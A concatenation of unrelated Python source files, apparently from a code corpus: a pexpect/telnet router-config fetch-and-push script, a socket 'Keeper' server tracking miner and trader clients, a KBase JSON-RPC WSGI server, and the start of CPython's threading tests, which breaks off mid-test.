handler.expect('Press RETURN to get started', timeout = longtimeout)
except:
print('ERROR: error waiting for "Press RETURN to get started" prompt.')
node_quit(handler)
return False
handler.sendline('\r\n')
try:
handler.expect('Router>', timeout = expctimeout)
except:
print('ERROR: error waiting for "Router> prompt.')
node_quit(handler)
return False
handler.sendline('enable')
try:
handler.expect('Router#', timeout = expctimeout)
except:
print('ERROR: error waiting for "Router# prompt.')
node_quit(handler)
return False
return True
else:
# Unexpected output
node_quit(handler)
return False
def node_quit(handler):
if handler.isalive() == True:
handler.sendline('quit\n')
handler.close()
def config_get(handler):
# Clearing all "expect" buffer
while True:
try:
handler.expect('#', timeout = 0.1)
except:
break
# Disable paging
handler.sendline('terminal length 0')
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
# Getting the config
handler.sendline('more system:running-config')
try:
handler.expect('#', timeout = longtimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
config = handler.before.decode()
# Manipulating the config
config = re.sub('\r', '', config, flags=re.DOTALL) # Unix style
config = re.sub('.*Using [0-9]+ out of [0-9]+ bytes\n', '', config, flags=re.DOTALL) # Header
config = re.sub('.*more system:running-config\n', '', config, flags=re.DOTALL) # Header
config = re.sub('!\nend.*', '!\nend\n', config, flags=re.DOTALL) # Footer
return config
def config_put(handler):
while True:
try:
i = handler.expect('CVAC-4-CONFIG_DONE', timeout)
except:
return False
return True
def usage():
print('Usage: %s <standard options>' %(sys.argv[0]));
print('Standard Options:');
print('-a <s> *Action can be:')
print(' - get: get the startup-configuration and push it to a file')
print(' - put: put the file as startup-configuration')
print('-f <s> *File');
print('-p <n> *Console port');
print('-t <n> Timeout (default = %i)' %(timeout));
print('* Mandatory option')
def now():
# Return current UNIX time in milliseconds
return int(round(time.time() * 1000))
def main(action, fiename, port):
try:
# Connect to the device
tmp = conntimeout
while (tmp > 0):
handler = pexpect.spawn('telnet 127.0.0.1 %i' %(port))
time.sleep(0.1)
tmp = tmp - 0.1
if handler.isalive() == True:
break
if (handler.isalive() != True):
print('ERROR: cannot connect to port "%i".' %(port))
node_quit(handler)
sys.exit(1)
if action == 'get':
# Login to the device and get a privileged prompt
rc = node_login(handler)
if rc != True:
print('ERROR: failed to login.')
node_quit(handler)
sys.exit(1)
config = config_get(handler)
if config in [False, None]:
print('ERROR: failed to retrieve config.')
node_quit(handler)
sys.exit(1)
try:
fd = open(filename, 'a')
fd.write(config)
fd.close()
except:
print('ERROR: cannot write config to file.')
node_quit(handler)
sys.exit(1)
elif action == 'put':
rc = config_put(handler)
if rc != True:
print('ERROR: failed to push config.')
node_quit(handler)
sys.exit(1)
# Remove lock file
lock = '%s/.lock' %(os.path.dirname(filename))
if os.path.exists(lock):
os.remove(lock)
# Mark as configured
configured = '%s/.configured' %(os.path.dirname(filename))
if not os.path.exists(configured):
open(configured, 'a').close()
node_quit(handler)
sys.exit(0)
except Exception as e:
print('ERROR: got an exception')
print(type(e)) # the exception instance
print(e.args) # arguments stored in .args
print(e) # __str__ allows args to be printed directly,
node_quit(handler)
return False
if __name__ == "__main__":
action = None
filename = None
port = None
# Getting parameters from command line
try:
opts, args = getopt.getopt(sys.argv[1:], 'a:p:t:f:', ['action=', 'port=', 'timeout=', 'file='])
except getopt.GetoptError as e:
usage()
sys.exit(3)
for o, a in opts:
if o in ('-a', '--action'):
action = a
elif o in ('-f', '--file'):
filename = a
elif o in ('-p', '--port'):
try:
port = int(a)
except:
port = -1
elif o in ('-t', '--timeout'):
try:
timeout = int(a)
except:
timeout = -1
else:
print('ERROR: invalid parameter.')
# Checking mandatory parameters
if action == None or port == None or filename == None:
usage()
print('ERROR: missing mandatory parameters.')
sys.exit(1)
if action not in ['get', 'put']:
usage()
print('ERROR: invalid action.')
sys.exit(1)
if timeout < 0:
usage()
print('ERROR: timeout must be 0 or higher.')
sys.exit(1)
if port < 0:
usage()
print('ERROR: port must be 32768 or higher.')
sys.exit(1)
if action == 'get' and os.path.exists(filename):
usage()
print('ERROR: destination file already exists.')
sys.exit(1)
if action == 'put' and not os.path.exists(filename):
usage()
print('ERROR: source file does not already exist.')
sys.exit(1)
if action == 'put':
try:
fd = open(filename, 'r')
config = fd.read()
fd.close()
except:
usage()
print('ERROR: cannot read from file.')
sys.exit(1)
# Backgrounding the script
end_before = now() + timeout * 1000
p = multiprocessing.Process(target=main, name="Main", args=(action, filename, port))
p.start()
while (p.is_alive() and now() < end_before):
# Waiting for the child process to end
time.sleep(1)
if p.is_alive():
# Timeout occurred
print('ERROR: timeout occurred.')
p.terminate()
sys.exit(127)
if p.exitcode != 0:
sys.exit(127)
sys.exit(0)
|
Keeper.py
|
import socket
import argparse
import threading
import re
import pickle
import time
from colorama import Fore, Style
from argparse import RawTextHelpFormatter
styleKeeper = Fore.CYAN + Style.BRIGHT
styleHeartbeat = Fore.RED + Style.BRIGHT
class Keeper():
def __init__(self, ip, port):
'''
Construtor da classe do servidor centralizado.
:param ip:
'''
self.ip = ip
self.port = port
self.clients = ([], [])
self.clientsSockets = []
def show_clients(self):
global styleKeeper
print(styleKeeper + '\nUsers:')
print(styleKeeper + '\tMiners:')
for miner in self.clients[0]:
print(styleKeeper + '\t\t{}'.format(miner))
print(styleKeeper + '\tTraders:')
for trader in self.clients[1]:
print(styleKeeper + '\t\t{}'.format(trader))
@property
def listClients(self):
return self.clients[0] + self.clients[1]
@property
def ip(self):
return self._ip
@property
def port(self):
return self._port
@ip.setter
def ip(self, ip):
self._ip = ip
@port.setter
def port(self, port):
self._port = port
def heartbeat(self):
global styleHeartbeat
while True:
flag_dead = False
deads = []
time.sleep(1)
print(styleHeartbeat + '\nInitializing Heartbeat on clients:')
for ip in self.listClients:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(ip)
sock.send(b'UAlive?')
msg = sock.recv(1024)
if msg:
print(styleHeartbeat + '\t{} still alive :)'.format(ip))
else:
print(styleHeartbeat + '\t{} is dead :X'.format(ip))
deads.append(ip)
self.remove_client(ip)
flag_dead = True
except (ConnectionRefusedError, ConnectionResetError):
print(styleHeartbeat + '\t{} is dead :X'.format(ip))
deads.append(ip)
self.remove_client(ip)
flag_dead = True
for dead in deads:
self.notify_ip(dead, 'DEAD')
if flag_dead:
self.show_clients()
flag_dead = False
def remove_client(self, client):
if client in self.clients[0]:
self.clients[0].remove(client)
if client in self.clients[1]:
self.clients[1].remove(client)
def notify_ip(self, address, case):
global styleKeeper
for ip in self.listClients:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(ip)
if re.search('DEAD', case):
sock.send(b'DEAD')
msg = sock.recv(1024)
if re.search('Ok', msg.decode('utf-8')):
sock.send(pickle.dumps(address))
msg = sock.recv(1024)
if re.search('Ok', msg.decode('utf-8')):
print(styleKeeper +
'\tClient {} notified for dead client'.format(ip))
if re.search('NEWMiner', case):
sock.send(b'NEWMiner')
msg = sock.recv(1024)
if re.search('Ok', msg.decode('utf-8')):
sock.send(pickle.dumps(address))
msg = sock.recv(1024)
if re.search('Ok', msg.decode('utf-8')):
print(styleKeeper + '\t\tsent to {}'.format(ip))
if re.search('NEWTrader', case):
sock.send(b'NEWTrader')
msg = sock.recv(1024)
if re.search('Ok', msg.decode('utf-8')):
sock.send(pickle.dumps(address))
msg = sock.recv(1024)
if re.search('Ok', msg.decode('utf-8')):
print(styleKeeper + '\t\tsent to {}'.format(ip))
sock.close()
def connected(self, conn, addr):
global styleKeeper
ip = addr[0]
while True:
msg = conn.recv(1024)
try:
if re.search('NEWMiner', msg.decode('utf-8')):
conn.send(b'Ok')
serverPort = conn.recv(1024)
print(styleKeeper + '\tNew Miner {}'.format((ip, serverPort)))
self.notify_ip((ip, int(serverPort)), 'NEWMiner')
self.clients[0].append((ip, int(serverPort)))
conn.send(b'Ok')
elif re.search('NEWTrader', msg.decode('utf-8')):
conn.send(b'Ok')
serverPort = conn.recv(1024)
print(
styleKeeper + '\tNew Trader {}'.format((ip, serverPort)))
self.notify_ip((ip, int(serverPort)), 'NEWTrader')
self.clients[1].append((ip, int(serverPort)))
conn.send(b'Ok')
if re.search('GiveMeUsers', msg.decode('utf-8')):
conn.send(pickle.dumps(self.clients))
break
except:
pass
self.show_clients()
def start_server(self):
global styleKeeper
try:
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
server.bind((self.ip, self.port))
server.listen(10)
print(styleKeeper + "Server Running on port {}\n".format(self.port))
except:
print(styleKeeper + "Error on start server - Bind port!\n")
thread_heartbeat = threading.Thread(target=self.heartbeat, args=())
thread_heartbeat.start()
try:
while True:
conn, addr = server.accept()
print(
styleKeeper + "New connection from {} with port {}:".format(addr[0], addr[1]))
thread = threading.Thread(
target=self.connected, args=(conn, addr))
thread.start()
except:
server.close()
print(styleKeeper + "Ending the execution of server - No messages!\n")
except (KeyboardInterrupt, SystemExit):
print(styleKeeper + "Finishing the execution of server...\n")
|
kb_assembly_compareServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_assembly_compare.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_assembly_compare'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_assembly_compare.kb_assembly_compareImpl import kb_assembly_compare # noqa @IgnorePep8
impl_kb_assembly_compare = kb_assembly_compare(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_assembly_compare'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_assembly_compare.run_filter_contigs_by_length,
name='kb_assembly_compare.run_filter_contigs_by_length',
types=[dict])
self.method_authentication['kb_assembly_compare.run_filter_contigs_by_length'] = 'required' # noqa
self.rpc_service.add(impl_kb_assembly_compare.run_contig_distribution_compare,
name='kb_assembly_compare.run_contig_distribution_compare',
types=[dict])
self.method_authentication['kb_assembly_compare.run_contig_distribution_compare'] = 'required' # noqa
self.rpc_service.add(impl_kb_assembly_compare.run_benchmark_assemblies_against_genomes_with_MUMmer4,
name='kb_assembly_compare.run_benchmark_assemblies_against_genomes_with_MUMmer4',
types=[dict])
self.method_authentication['kb_assembly_compare.run_benchmark_assemblies_against_genomes_with_MUMmer4'] = 'required' # noqa
self.rpc_service.add(impl_kb_assembly_compare.status,
name='kb_assembly_compare.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_assembly_compare ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import verbose, import_module, cpython_only, unlink
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
import traceback
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
